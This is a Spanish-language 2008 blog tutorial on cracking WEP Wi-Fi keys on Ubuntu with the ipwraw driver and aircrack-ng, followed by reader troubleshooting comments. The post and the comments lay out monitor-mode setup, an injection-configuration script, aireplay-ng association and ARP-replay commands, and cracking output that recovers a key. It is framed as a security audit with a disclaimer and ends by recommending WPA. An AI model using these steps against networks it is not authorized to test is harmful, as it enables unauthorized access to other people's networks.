Un espacio, para la libertad.
Adutoria de seguridad wireless con ipw3945 ubuntu y aircrack
6Mar2008 Categoria: LINUX, SEGURIDAD, UBUNTU, WIRELESS Autor: yovanyEn vista al interes de muchos de mis amigos, en cuanto este tema, vamos a dar una pequeña reseña sobre la inseguridad del cifrado WEP, en las redes wireless.
Cabe mencionar que no nos hacemos responsables del mal uso que se le pueda dar a esta informacion y que lo unico que pretendemos es poner en evidencia la inseguridad que representa usar el cifrado WEP en las redes wireless, y que las pruebas que podamos efectuar, siempre sea dentro de redes en las cuales tengamos total concentimiento de sus administradores o propietarios, aclarado este punto continuemos con lo que nos interesa.
Esta informacion esta comprobada para las versiones 7.4 y 7.10, cuando instalamos ubuntu en nuestro equipo, por defecto instala la tarjeta de red con el modulo IPW394 (Intel ProWireless 3945 ABG), para poder hacer la auditoria, es necesario poder poner la tarjeta en modo monitor, lo cual no es posible con este modulo, por lo que es necario instalar los modulos IPWRAW
Antes de instalar el ipwraw debemos instalar algunas dependencias, esto lo hacemos de la siguiente forma
$ sudo apt-get install - linux-ubuntu-modules-$(uname -r) linux-restricted-modules-$(uname -r) linux-image-debug-$(uname -r) linux-image-$(uname -r) linux-headers-$(uname -r)
Aqui (uname -r), nos sirve para devolver la version del kernel que tenemos instalado, asi no tendremos problemas para instalar los paquetes que requerimos.
Si no hemos tenido ningun error hasta aqui, continuamos con la instalacion de ipwraw
descargamos las fuentes
Descomprimimos el paquete,
Para instalar, nos cambiamos a la carpeta que se acaba de generar, y tecleamos.
sudo make install
sudo make install_ucode
Con esto ya esta instalado el modulo, pero ahora lo agregaremos a la black list, esto para que no lo carge por defecto si no, solo cuando lo necesitemos.
sudo depmod -ae
Ya tenemos todo listo, para poder usar el ipwraw ahora solo hay desmontar el driver ipw3945 y cargar el ipwraw
sudo modprobe ipwraw
Para cargar el ipw3945, hacemos lo mismo, pero al contrario.
sudo modprobe ipw3945
Despues de montar y desmontar los driver's hay que esperar un poco para que se efectuen los cambios.
Para comprobar, que esten funcionando, tecleamos lo siguiente.
Y devemos obtener algo como esto.
eth0 no wireless extensions.
vmnet1 no wireless extensions.
vmnet8 no wireless extensions.
eth1 unassociated ESSID:off/any
Mode:Monitor Channel=1 Bit Rate=54 Mb/s
rtap0 no wireless extensions.
Tal vez puedas obtener wifi0 en lugar de eth1
Para efectuar la auditoria necesitaremos la suite aircrack si no la tenemos instalada lo hacemos con esto.
Listo, ahora empezaremos por averiguar cuales son los acces points accesibles
Y deberiamos obtener algo parecido a esto.
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
XX:XX:XX:XX:XX:XX 0 86 9 0 1 54. WEP WEP MAGI
BSSID STATION PWR Lost Packets Probes
Al identificar nustro objetivo debemos ejecutar el siguiente script para poder inyectar trafico.
Veremos algo asi
1
“Indica el rate de captura por defecto debe ser 2”
2
“Indica el bssid objetivo”
XX:XX:XX:XX:XX:XX
“Configuracion completada, listo par inyectar”
Empezamos a capturar los paquetes con el airodump-bg
Y deberiamos obteneralgo asi
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
XX:XX:XX:XX:XX:XX 0 100 467 47 0 1 54. WEP WEP MAGI
BSSID STATION PWR Lost Packets Probes
Para poder inyectar necesitamos asociarnos con el acces point.
21:52:30 Sending Authentication Request
21:52:30 Authentication successful
21:52:30 Sending Association Request
21:52:32 Association successful :-)
Ya que estamos asociados, podemos inyectar para poder generar DATA que son los paquetes que nos interesan
En unos cuantos segundos podemos ver como genero unos miles de DATA
You should also start airodump-ng to capture replies.
Read 16339 packets (got 8045 ARP requests), sent 8042 packets...(333 pps)
Esperamos alrededor de 10 min para obtener una buena cantidad de DATA, el tiempo puede variar segun la distancia a la que te encuentres del acces point, no hay una cantidad exacta pero entre 200 300 mil DATA son suficientes segun lo comprobado.
Ahora solo hay que pasar el fichero por el aircrack
Y listo
[00:00:01] Tested 1 keys (got 552366 IVs)
KB depth byte(vote)
0 0/ 1 39( 100) 11( 33) D6( 15) 6C( 13) 6D( 12) 0D( 11) 17( 9) 95( 8) 5D( 5) 76( 5) 93( 5) D0( 5) 00( 4) 0C( 4) 3A( 3)
1 0/ 1 93( 100) 03( 37) 06( 31) 83( 19) 19( 13) 39( 12) B3( 12) D4( 12) 02( 11) CC( 8) FD( 7) 6C( 5) 86( 5) D2( 5) 30( 4)
2 0/ 1 19( 121) 1B( 15) CE( 12) EB( 12) 2C( 9) 41( 8) 82( 8) CD( 6) 00( 5) 15( 5) 1A( 5) 2B( 5) 34( 5) 39( 5) A2( 5)
3 0/ 1 94( 88) 18( 20) 78( 18) D8( 17) 19( 16) D0( 16) 0D( 10) 83( 9) 69( 8) 75( 6) 82( 6) A0( 6) 41( 5) 46( 5) A2( 5)
KEY FOUND! [ 39:93:19:94:35 ]
Decrypted correctly: 100%
Todo esto se puede hacer de forma mas simple, con el airoway.sh solo hay que editar la interfas de injecion segun sea nuestro caso, que puede ser wifi0 o eth1
INJECT="eth1"
Como podemos ver, el cifrado WEP no es suficiente para la proteccion de nuestra redes wireless, no exponga la integridad de su red, y utilecen WPA.
Espero le haya sido de utilidad.
Referencias:
http://aircrack-ng.org/doku.php?id=ipw3945
http://seguridadwireless.net
47 Respuestas en “Adutoria de seguridad wireless con ipw3945 ubuntu y aircrack”
Deja un comentario.
- Posts (RSS)
- Commentarios (RSS)
Sobre este blog
Bienvenido, a vive-libre.com un espacio para la difusion del software libre, Ubuntu y todo lo relacionado con la cultura digital.
alberto
Abril 14th, 2008 el 12:59 pm
este error al hacer el make install a que puede ser debido? (by un principiante en linux).GRACIAS
alberto@alberto-desktop:~/ipwraw-ng$ sudo make install
make: *** No hay ninguna regla para construir el objetivo `ipwraw.ko’, necesario para `install’. Alto.
yovany
Abril 14th, 2008 el 7:08 pm
Sorry fuen un error mio, primero hay que hacer un make y despues el make install
Ya lo corregi checalo.
Saludos
alberto
Abril 15th, 2008 el 12:22 am
Hola, gracias por contestar. Supuse que faltaba y lo puse, pero entonces al hacer el “sudo make install” me salía este otro error:
http://pastebin.com/f4d42580c
mas peliagudo que el anterior, si cabe. decicí entonces darlo todo por perdido xD.
yovany
Abril 15th, 2008 el 1:51 am
Eso si esta critico, veo que tu maquina es de escritorio o me equivoco.
alberto
Abril 15th, 2008 el 2:50 am
no, es un laptop DELL 1525 con ubuntu emulado sobre windows vista con una máquina virtual (VMware). lo de alberto-desktop se lo pone ubuntu por defecto al instalarlo y no lo quito por vago :P. saludos!
yovany
Abril 15th, 2008 el 3:04 pm
Creo que es ahi donde esta el problema, ya que la maquina virtual te emula una tarjeta generica, no es realmente tu tarjeta fisca, solo la usa como puente, pero no trabaja directamente sobre ella, tendrias que instalar el ubuntu de manera fisica en tu compu, si no pues podrias usar una distro live el backtrack 3 ya trae soporte para la ipw3945, y los comandos son los mismo de este tuto.
alberto
Abril 15th, 2008 el 4:51 pm
ahaham… pues muchas gracias por las molestias yovany. Muy buen blog, si señor.
yovany
Abril 15th, 2008 el 9:57 pm
Gracias a ti por visitarnos, voy a poner algo con el backtrack para que te des una idea de como funciona.
Saludos.
Jesus
Abril 29th, 2008 el 4:57 pm
Buenas a todos, estoy teniendo algunos problemas. A ver si alguien me puede ayudar.
No consigo cargar ipwraw.
Hago make, make install y make install_ucode. por el camino me dice que todo bien, que puedo cargar el driver con modprobe ipwraw. lo hago y todo bien, pero al hacer ifconfig, no veo ninguna interfaz inalambrica.
Estoy con Ubuntu Hardy AMD64 en un HP Pavilion dv9575. Ubuntu por defecto tiene los drivers iwl3945.
Alguna idea por aqui?
Muchas gracias de antemano!
yovany
Abril 29th, 2008 el 8:57 pm
Ok, no hay problema, los pasos para montar y desmontar son los siguientes.
modprobe -r iwl3945 //para desmontar el driver normal
modprobe ipwraw //para cargar
Para confirmar es
iwconfig
y te deve mostar
lo no wireless extensions.
eth0 no wireless extensions.
wifi0 unassociated ESSID:off/any
Mode:Monitor Channel=1 Bit Rate=54 Mb/s
rtap0 no wireless extensions.
Si no ves nada intenta, cargando el driver normal, y despues el ipwraw, por que hay veces que no carga a la primera, r
modprobe -r ipwraw //para desmontar el raw
modprobe iwl3945 //para cargar el normal
Con esto debe ser suficiente.
Saludos
Ricardo
Mayo 4th, 2008 el 11:41 pm
Hola , sabes que cuando bajo el modprobe iwl3945
arranco el modprobe para el ipwraw y vuelve a kargar el driver inicial por lo cual no puedo establecer modo monitor.
que sugieres, instalar el ipw3935 que funcionaba sin problemas o no se…. gracias
Ubunuttu 8.04
yovany
Mayo 5th, 2008 el 3:27 am
Que tal Ricardo…
Si lo tecleaste tal cual lo pones, debes agregar un -r que indica que lo vas a remover
sudo modprobe -r modulo
y despues cargar el otro modulo, tengo la misma tarjeta con ubuntu 8.4 y el modulo iwl3945, y no tengo ningun problema para cargar el driver, en modo monitor.
Aun que para la version de ubuntu 8.4 hay que instalar este dependencia para hacer jalar el ipwraw, aparte de las que estan indicadas en el how-to de seguridad que poste.
sudo apt-get install libssl-dev
Con esto no deberias de tener problemas, en para entar en modo monitor
Pero cualquier cosas aqui estamos.
Saludos.
Ricardo
Mayo 6th, 2008 el 1:16 am
gracias por su respuesta rapida
pero ahora me aparece esto
modprobe -r iwl3945
WARNING: /etc/modprobe.d/ipwraw line 1: ignoring bad line starting with ‘“blacklist’
FATAL: Error removing iwl3945 (/lib/modules/2.6.24-16-generic/updates/wireless/iwlwifi/iwlwifi/compatible/iwl3945.ko): Operation not permitted
jajaja en el ubuntu 7.10 no tenia ningun problema pero bueno
gracias por tus respuestas
Ricardo
Mayo 6th, 2008 el 1:16 am
gracias por su respuesta rapida
pero ahora me aparece esto
modprobe -r iwl3945
WARNING: /etc/modprobe.d/ipwraw line 1: ignoring bad line starting with ‘“blacklist’
FATAL: Error removing iwl3945 (/lib/modules/2.6.24-16-generic/updates/wireless/iwlwifi/iwlwifi/compatible/iwl3945.ko): Operation not permitted
jajaja en el ubuntu 7.10 no tenia ningun problema pero bueno
gracias por tus respuestas
que hago men……. como puedo volver a hacer una instalacion limpia es decir eliminar topdo lo ya instalado o tengo arreglo asi komo voy
gracias again
yovany
Mayo 6th, 2008 el 1:42 am
No hay problema, mira, para cualquier operacion sobre el sistema en la consola debes de usar el prefijo sudo, este funciona como si lo ejecutaras como root, en este caso se pone sudo antes del comando separados por un espacio, ej:
sudo modprobe -r iwl3945
Hice la prueba y con eso es todo…
Saludos
Ricardo
Mayo 6th, 2008 el 11:59 pm
Gracias se paso por la ayuda….. por fin tuve opcion de colocarla en modo monitor, aunque la asociacion me reulta de esta manera
ASOCIAR: aireplay-g -1 0 -a ESSID -e MAC_PUNTODEACCESO -h mi_mac wifi0
y la asociacion comienza no siempre se logra de forma correcta…..
y la inyeccion funciona de buena forma……. no hay forma de forzar mas la inyeccion …
de ante mano muchas gracias por tu tiempo y por ayudarme
Pablo
Mayo 9th, 2008 el 5:58 pm
He estado intentando usar el scrip airoway.sh pero cuando intento ejecutarlo me sale el siguiente error:
airoway.sh: 59: Syntax error: “(” unexpected
Tengo Ubuntu Hardy, y de modulo de red el iwl3945, puedo cargar sin problemas ipwraw, pero el problema es al ejecutar el script.
Y si intento por consola con: airodump-ng rtap0, no me sale nada, el cursor baja pero todo sale en blanco, alguna ayuda por favor.
yovany
Mayo 10th, 2008 el 1:13 am
No hay problema, ya cheque el error, habre el archivo y elimina los parentesis de la linea donde dice “por defecto debe ser 2″, y con eso corre : )
Error de dedo.
Saludos.
guille
Mayo 10th, 2008 el 6:21 pm
Buenas, felicidades por el manual, me sirvio, pero tengo una cosa que no me sale (no esta en el manual), se que se puede escanear todas las redes sin ir pasando de una en una, tengo una tarjeta 3945 con ubuntu 8.04, probe como dice la pagina de aircrack “airodump-ng rtap0 out 0″ (out es el nombre del archivo a capturar y 0 es que escanee en todos los canales y nada) tambien si pongo airodump-ng –help dice que escanea todo solo me escanea en un solo canal, ¿como puedo hacerlo?. gracias por todo
Omar
Mayo 11th, 2008 el 9:56 pm
Hola!! mira tengo el ubuntu 8.4 con wubi pero al momento de que trato de hacer el modprobe -r ipw3945 me dice que FATAL:module ipw3945 not found, hago el iwconfig y no me aparece nada más que :
lo no wireless extensions.
eth0 no wireless extensions.
wmaster0 no wireless extensions.
wlan0 IEEE 802.11g ESSID:”" Nickname:”"
Mode:Managed Frequency:2.412 GHz Access Point:
Bit Rate=54 Mb/s Tx-Power=27 dBm
Retry min limit:7 RTS thr:off Fragment thr=2346 B
Power Management:off
Link Quality=66/100 Signal level=-67 dBm Noise level=-96 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
que debo de hacer para que me funcione?
yovany
Mayo 11th, 2008 el 11:01 pm
Hola Omar.
Lo que pasa es que en ubuntu 8.4 el modulo que usa ;a tarjeta es el iwl3945, el ipw3945 funciona en el 7.4 y 7.10. pruebalo asi
sudo modprobe -r iwl3945
Con esto es todo.
Saludos.
Omar
Mayo 12th, 2008 el 5:23 am
si me funcionó, muchas gracias
Felipe
Mayo 14th, 2008 el 2:56 am
Hola lamento molestarte bueno te cuento, tengo un dell XPS M1530 con esa tarjeta intel, tengo kubuntu Hardy, hice todos los pasos, descargo bien el driver, no tuve problemas al extraerlos, pero al momento de ir a la carpeta donde lo extraje y hacer “sudo make”, me sale este error.
make -C /lib/modules/2.6.24-17-generic/build M=/home/elofreak/ipwraw-ng modules
make[1]: se ingresa al directorio `/usr/src/linux-headers-2.6.24-17-generic’
CC [M] /home/elofreak/ipwraw-ng/ipwraw.o
/home/elofreak/ipwraw-ng/ipwraw.c: En la función ‘store_bssid’:
/home/elofreak/ipwraw-ng/ipwraw.c:1500: error: declaración implícita de la función ‘MAC_ARG’
/home/elofreak/ipwraw-ng/ipwraw.c:1500: aviso: faltan argumentos para el formato
/home/elofreak/ipwraw-ng/ipwraw.c:1506: aviso: faltan argumentos para el formato
/home/elofreak/ipwraw-ng/ipwraw.c: En la función ‘show_bssid’:
/home/elofreak/ipwraw-ng/ipwraw.c:1516: aviso: faltan argumentos para el formato
/home/elofreak/ipwraw-ng/ipwraw.c: En la función ‘ipw_print_rx_config’:
/home/elofreak/ipwraw-ng/ipwraw.c:2565: aviso: faltan argumentos para el formato
/home/elofreak/ipwraw-ng/ipwraw.c:2567: aviso: faltan argumentos para el formato
/home/elofreak/ipwraw-ng/ipwraw.c: En la función ‘tx_skb’:
/home/elofreak/ipwraw-ng/ipwraw.c:7421: aviso: faltan argumentos para el formato
/home/elofreak/ipwraw-ng/ipwraw.c: En la función ‘ipw_net_set_mac_address’:
/home/elofreak/ipwraw-ng/ipwraw.c:7610: aviso: faltan argumentos para el formato
/home/elofreak/ipwraw-ng/ipwraw.c: En la función ‘ipw_up’:
/home/elofreak/ipwraw-ng/ipwraw.c:8081: aviso: faltan argumentos para el formato
/home/elofreak/ipwraw-ng/ipwraw.c: En la función ‘ipw_pci_probe’:
/home/elofreak/ipwraw-ng/ipwraw.c:8737: error: ‘SA_SHIRQ’ no se declaró aquí (primer uso en esta función)
/home/elofreak/ipwraw-ng/ipwraw.c:8737: error: (Cada identificador no declarado solamente se reporta una vez
/home/elofreak/ipwraw-ng/ipwraw.c:8737: error: para cada funcion en la que aparece.)
/home/elofreak/ipwraw-ng/ipwraw.c:8743: error: declaración implícita de la función ‘SET_MODULE_OWNER’
make[2]: *** [/home/elofreak/ipwraw-ng/ipwraw.o] Error 1
make[1]: *** [_module_/home/elofreak/ipwraw-ng] Error 2
make[1]: se sale del directorio `/usr/src/linux-headers-2.6.24-17-generic’
make: *** [modules] Error 2
elofreak@Y2K:~/ipwraw-ng$
Te imaginas que puedo estar haciendo mal????
Muchas gracias de ante mano.
Atte
Felipe
yovany
Mayo 14th, 2008 el 5:25 am
Hola felipe no es molestia.
Les comentaba a otras persona que para la version de ubuntu 8.4 hay que instalar esta dependencia para hacer jalar el ipwraw, aparte de las que estan indicadas en este post
sudo apt-get install libssl-dev
Pruebalo, y me cuentas como te fue.
Saludos.
yovany
Mayo 14th, 2008 el 5:25 am
Hola Omar.
Que bueno que te sirvio.
Saludos y estamos para ayudarte.
Felipe
Mayo 14th, 2008 el 6:47 pm
Muchas gracias, me resulto pero ahora tengo pequeños problemas con los siguientes comandos:
modprobe -r ipw3945 (se que este en hardy cambia por modprobe -r iwl3945)
modprobe ipwraw (Este comando en hardy queda igual)
Te pregunto porque al momento de cargar el driver me sale esto:
“elofreak@Y2K:~$ modprobe -r iwl3945
WARNING: /etc/modprobe.d/ipwraw line 1: ignoring bad line starting with ‘“blacklist’”
Creo que es porque anteriormente lo tire a la lista negra, pero como lo saco de ahi??, porque cada comando que ejecute me advierte lo mismo, dispositivo en lista negra.
Esa es mi duda, gracias por ser tan amable con los nuevos.
Atte
Felipe
yovany
Mayo 15th, 2008 el 4:23 am
Hola Felipe.
Cuando lo mandas a la lista negra le indicas al sistema, que ese modulo no lo va a cargar por defecto, como lo hace con iwl3945, de lo contrario tendrias que cargar de forma manual el iwl3945 para poder navegar normalmente con la tarjeta.
Lo que te indica el mensaje que estas forzando al sistema a cargar un modulo que esta en la lista negra, pero pues es cosa que no nos preocupa por que sabemos por que esta ahi, y para que sirve.
Espero haya sido claro.
Que estes bien Felipe.
Miguel
Mayo 31st, 2008 el 2:00 pm
Que tal primero que nada quiero felicitart por el tuto muy completo y stoy de acuerdo contigo con airoway es mucho mas facil yo he usado esto con wifislax pero ps tu sabras que es una lata star insertando el disco y bla bla es por eso q lo queria hacer con ubuntu 8.04 hardy pero desafortunadament no he tenido buenos resultados, he instalado la libssl y nada ojala me pudieras ayudar y aprovecho para mandarte un saludos
esto me pasa con el sudo make, por lo consiguiente el make install, me dice la opcion de alto, q en un post ya igual t lo pusieron
make -C /lib/modules/2.6.24-17-generic/build M=/home/gelito/ipwraw-ng modules
make[1]: se ingresa al directorio `/usr/src/linux-headers-2.6.24-17-generic’
CC [M] /home/gelito/ipwraw-ng/ipwraw.o
/home/gelito/ipwraw-ng/ipwraw.c: En la función ‘store_bssid’:
/home/gelito/ipwraw-ng/ipwraw.c:1500: error: declaración implícita de la función ‘MAC_ARG’
/home/gelito/ipwraw-ng/ipwraw.c:1500: aviso: faltan argumentos para el formato
/home/gelito/ipwraw-ng/ipwraw.c:1506: aviso: faltan argumentos para el formato
/home/gelito/ipwraw-ng/ipwraw.c: En la función ‘show_bssid’:
/home/gelito/ipwraw-ng/ipwraw.c:1516: aviso: faltan argumentos para el formato
/home/gelito/ipwraw-ng/ipwraw.c: En la función ‘ipw_print_rx_config’:
/home/gelito/ipwraw-ng/ipwraw.c:2565: aviso: faltan argumentos para el formato
/home/gelito/ipwraw-ng/ipwraw.c:2567: aviso: faltan argumentos para el formato
/home/gelito/ipwraw-ng/ipwraw.c: En la función ‘tx_skb’:
/home/gelito/ipwraw-ng/ipwraw.c:7421: aviso: faltan argumentos para el formato
/home/gelito/ipwraw-ng/ipwraw.c: En la función ‘ipw_net_set_mac_address’:
/home/gelito/ipwraw-ng/ipwraw.c:7610: aviso: faltan argumentos para el formato
/home/gelito/ipwraw-ng/ipwraw.c: En la función ‘ipw_up’:
/home/gelito/ipwraw-ng/ipwraw.c:8081: aviso: faltan argumentos para el formato
/home/gelito/ipwraw-ng/ipwraw.c: En la función ‘ipw_pci_probe’:
/home/gelito/ipwraw-ng/ipwraw.c:8737: error: ‘SA_SHIRQ’ no se declaró aquí (primer uso en esta función)
/home/gelito/ipwraw-ng/ipwraw.c:8737: error: (Cada identificador no declarado solamente se reporta una vez
/home/gelito/ipwraw-ng/ipwraw.c:8737: error: para cada funcion en la que aparece.)
/home/gelito/ipwraw-ng/ipwraw.c:8743: error: declaración implícita de la función ‘SET_MODULE_OWNER’
make[2]: *** [/home/gelito/ipwraw-ng/ipwraw.o] Error 1
make[1]: *** [_module_/home/gelito/ipwraw-ng] Error 2
make[1]: se sale del directorio `/usr/src/linux-headers-2.6.24-17-generic’
make: *** [modules] Error 2
yovany
Junio 1st, 2008 el 10:25 pm
Hola Miguel.
Muchas gracias por tus comentarios, te lo agradesco mucho y me alegra que esta info sea de utilidad, mira, yo actualmente uso la version 7.10, por que hay varios detalles que no me gustaron de la 8.4, yo tenia el mismo problema, al parecer los fuentes estan mal o tienen algun error, solo descarge de nuevo los fuentes y jalo normal, aun que por alguna razon no se podia inyectar, alparecer es cuestion del modulo iwl3945, he puesto un nuevo link a una version mas actual del ipwraw, checalo, y si no pues investigamos con los los de mas chicos…
Saludos y suerte…
Max Pringles
Junio 8th, 2008 el 2:45 am
Hola todo me funciono hasta la parte de ejecutar el script me aparece esto “Indica el canal para eth1 o wifi0?
1
“Indica el rate de captura por defecto debe ser 2”
2
“Indica el bssid objetivo”
00:1F:B3:5C:F2:09
eth1: ERROR mientras se obtenían las banderas de interfaz: No existe el dispositivo
chmod: no se puede acceder a `/sys/class/net/eth1/device/rate’: No existe el fichero ó directorio
script.sh: 12: cannot create /sys/class/net/eth1/device/rate: Directory nonexistent
script.sh: 13: cannot create /sys/class/net/eth1/device/channel: Directory nonexistent
script.sh: 14: cannot create /sys/class/net/eth1/device/bssid: Directory nonexistent
eth1: ERROR mientras se obtenían las banderas de interfaz: No existe el dispositivo
“Configuracion completada, listo par inyectar”
Tengo Ubuntu Hardy, ya modifique para que se quitaran los parentesis. ¿que hago? y a que te refieres con fichero.
yovany
Junio 8th, 2008 el 3:24 pm
Hola MAx..
Mira, lo que hace el script es configurar la interfas de red eth1 para inyectar, si la interfas de red que te creo es la wifi0 tendrias que cambiar donde dice eth1 por wifi0 en el script o por la que te cree, con eso debe de funcionar.
Con fichero me refiero a que es el archivo deonde se va guardar los paquetes capturados y puede llevar cualquier nombre.
Si no funciona de estar forma que es la manual puedes usar el siguiente script, que hace todo mas facil es el airoway.sh, este solo tienes que concederle permisos de ejecusion,
$sudo chmod a+x airoway.sh
dentro del script hay una seccion donde se declaran las tarjetas de injeccion y de escaneo,
LISTEN=”rtap0″
INJECT=”eth1″
por defecto la de escaneo siempre es rtap0 y la de injeccion puede ser wifi0, o eth1 o la que se que te cree, lo puedes verificar con un
$ sudo iwconfig
Y el script lo consigues
http://www.vive-libre.com/blog/etc/airoway.sh
andres
Junio 17th, 2008 el 8:46 pm
llegue hasta el paso dos donde se descargan las fuentes hasta ahi todo bien(descarga este archivo ipwraw-ng-2.3.4-04022008.tar.bz2) despues cuando las descomprimo me sale esto
andres@andres-laptop:~$ tar -xjf ipwraw-ng*
tar: ipwraw-ng: No se puede read: Es un directorio
tar: Al principio de la cinta, se terminará ahora
tar: El error no es recuperable: salida ahora
bzip2: Compressed file ends unexpectedly;
perhaps it is corrupted? *Possible* reason follows.
bzip2: Invalid argument
Input file = (stdin), output file = (stdout)
It is possible that the compressed file(s) have become corrupted.
You can use the -tvv option to test integrity of such files.
You can use the `bzip2recover’ program to attempt to recover
data from undamaged sections of corrupted files.
tar: Child returned status 2
tar: ipwraw-ng-2.3.4-04022008.tar.bz2: No se encuentra en el archivo
tar: Salida con error demorada desde errores anteriores
como nota aparte me sale un archivo ipwraw-ng con un candadito osea no lo puedo borrar
eso
saludos!! gracias a los que posteen
Manuel
Junio 17th, 2008 el 11:54 pm
lo probe con mi router linksys y le saqué la wep en un rato… de entre las diferentes opciones de contraseñas cual es la más segura? es un rollo ponerse a filtrar por mac.
un saludo yovani, peazo de blog tienes!
yovany
Junio 18th, 2008 el 2:33 am
Hola Manuel…
Muchas gracias, por tus cometarios, se hace lo que se puede, con respecto, al cifrado, pues el mas adecuado seria WPA, pero actualmente ya es posible descifralo }-> pero puedes usar una combinacion de estrategias si se les puede decir asi, por ejemplo,
Puedes configurar el router para que no difunda el nombre de la red ESSID, esto hace que no aparesca de primera vista la red WIFI y las maquinas que se quieran conectar tendran que introduccir este parametro.
Puedes bloquear la autenticacion, para que sea mas dificil que se asocien al AP para inyectar.
Tambien puedes deshabilitar el DNS, y cambiar el rango de IP que vienen por defecto.
Pero al final de cuentas si te quieren fastidiar hay formas para que lo hagan, si solo es por fisgonear, pues con eso se pueden desanimar y buscar a alguien mas vulnerable, nunca falta alguien despistado.
Espero que te sea de utilidad que estes bien.
Saludos
yovany
Junio 18th, 2008 el 2:38 am
Hola Andres.
Lo que tienes que teclear es lo siguiente
tar -xjf ipwraw-ng-2.3.4-04022008.tar.bz2
El asterisco es solo un comodin que indica que lo que sigue despues de ahi puede cambiar segun la version del paquete que tengas, pero ya lo modifique en el manual para que no haya confucion.
Cuidate y que estes bien, seria interesante abrir una galeria de pantallas a las cuales hemos auditado y tiene problemas de seguridad
andres
Junio 18th, 2008 el 9:20 pm
gracias yovani
instale todo ok
ahora tengo un problema no se como ejecutar un script.. se supone que hago un copy paste del script y lo pego en el terminal? o hago un copi paste de esta manera
#!/bin/bash
clear
echo “6?
read canal
echo “2”
read rate
echo “00:33:22:44:55:66”
read bssid
ifconfig eth1 down
chmod u+wrx /sys/class/net/eth1/device/rate
echo $rate >/sys/class/net/eth1/device/rate
echo $canal >/sys/class/net/eth1/device/channel
echo $bssid >/sys/class/net/eth1/device/bssid
ifconfig eth1 up
echo “Configuracion completada, listo par inyectar”
algo asi por ejemplo… si lo hago asi me tira esto
andres@andres-laptop:~$ #!/bin/bash
andres@andres-laptop:~$
andres@andres-laptop:~$ clear
andres@andres-laptop:~$ echo “6?
eso saludos a los que me ayuden
chau
andres
Junio 18th, 2008 el 9:21 pm
al parecer al copiar y pegar no quedan bien las comillas
yovany
Junio 20th, 2008 el 3:23 pm
Hola Andres..
Para ejecutar un scripr, primero hay que darle premisos,
Dentro de la termina, te ubicas en la carpeta donde guardaste el archivo, y tecleas lo siguiente.
(El pesito $ solo es para indicar que estamos en la terminal como usuario normal no se pone)
$ sudo chmod a+x archivo
Cuando son archivos binarios o de bash se ejecutan de la siguiente manera ./ archivo
$ sudo ./ script
Y con eso lo ejecutas
Espero haya sido claro
Saludos
andres
Junio 20th, 2008 el 6:45 pm
gracias yovani…
primero los comandos hay que ejecutarlos con sudo(aireplay airodump etc) al menos asi me resulta ami, y el script funciona eliminando los parentesis y cambiando todos los eth por wifi0
ahora otra consulta uando me intento asociar me sale lo siguiente
wifi is on channel 5, but the ap uses channel 6….
es extraño porque siempre reviso y pongo el canal correctamente(el del ap) en el comando aireplay-ng -1 0 -e ESSID -a MAC AP -H mimac wifi0
lo he intentado con distintas señales y aun asi me ese error
como que me quiere decir que la señal esta en otro canal al que veo en el airodump
eso si alguien le paso lo mismo denme sus comentarios o al que tenga alguna idea de esto
saludos a todos, gracias yovani por las respuestas..
chau
Pablo
Junio 27th, 2008 el 3:44 pm
Por fin pude hacerlo funcionar. Tengo Ubuntu 8.04 con iwl3945.
Aquí esta la secuencia de comandos que hice (despues de cargar el modulo ipwraw):
Ventana 1
$ sudo modprobe -r iwl3945
$ sudo modprobe ipwraw
$ sudo airodump-ng rtap0
Ventana 2
$ sudo ./SCRIPT.sh
$ sudo airodump-ng -c CANAL -w FICHERO rtap0
Ventana 3
$ sudo aireplay-ng -1 0 -e ESSID -a BSSID -h STATION wifi0
Ventana 4
$ sudo aireplay-ng -3 -b BSSID -h STATION wifi0
Ventana 5
$ sudo aircrack-ng FICHERO.cap
Como veran a la ventana 4 le quite un -h que sobra en el tuto.
=)
Pablo
Junio 27th, 2008 el 3:47 pm
Despues modifico el script de airoway para que funcione con mi distro y el iwl3945. Por si a alguien le interesa
pato
Julio 10th, 2008 el 6:47 am
no se que pasa e echo todo correctamente pero al momento de poner el comando airodump-ng rtap0
me da el siguiente error
ioctl(SIOCGIFINDEX) failed: No such device
no entiendo k podra ser una ayudita porfavor gracias
pato
Julio 10th, 2008 el 7:46 am
a mira creo saber ese error y es pk mi tarjeta inalambrica no es rtap 0 sino wlan0
pero al hacerlo haci me dice ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211
or ARPHRD_IEEE80211_PRISM instead. Make sure RFMON is enabled:
run ‘ifconfig wlan0 up; iwconfig wlan0 mode Monitor channel ‘
Sysfs injection support was not found either.
se k para ponerlo en modo monitoreo es airmon-ng start wlan0
pero cuando lo ago me sale esto
Interface Chipset Driver
wlan0 iwl3945 - [phy0]/usr/sbin/airmon-ng: line 316: /sys/class/ieee80211/phy0/add_iface: No existe el fichero ó directorio
mon0: ERROR mientras se obtenían las banderas de interfaz: No existe el dispositivo
pato
Julio 10th, 2008 el 8:57 am
ya les cuento mas logre hacer k funcionara el airodump-ng rtap0
con los comandos de pablo:
$ sudo modprobe -r iwl3945
$ sudo modprobe ipwraw
pero el problema k al ejecutar el udo airodump-ng rtap0 como k se me pega el terminal y tengo k hacerlo un par de veces para k funcione pero el problema es que no me muestra redes nisiquiera la de mi casa o la de mi vecino niuna
no se cual sera el problema y si pongo iwconfig me sale lo mismo que en el tutorial que estoy en modo monitoreo pero no veo niuna red al poner udo airodump-ng rtap0 bueno
me rindo por hoy es vastante tarde voy a esperar alguna ayudita o comentario sobre mi problema haber si podemos solucionarlo
pato
Julio 10th, 2008 el 5:47 pm
respondanme porfavor ahora logre k funcionara el airodump-ng rtap0
y me salen las redes pero ahora no puedo ejecutar el scrip
escribi esto
sudo ./SCRIPT.sh
pero no me funciona y baje el script pero no se pk no se ejecuta bueno y el siguiente paso no se muy bien cual es mi canal y mi fichero
porfavor help please
Gustavo
Julio 10th, 2008 el 11:19 pm
Buenas, muy bueno el tuto
La primera vez que probe, funciono todo de maravilla. El problema es que cuando he vuelto a probar, soy incapaz de asociarme al AP. Se queda perene intentando asociarse ¿A que se puede deber?
Salu2 y gracias
Pablo
Julio 14th, 2008 el 6:07 pm
Perdonen que no haya podido entrar antes, he estado muy ocupado.
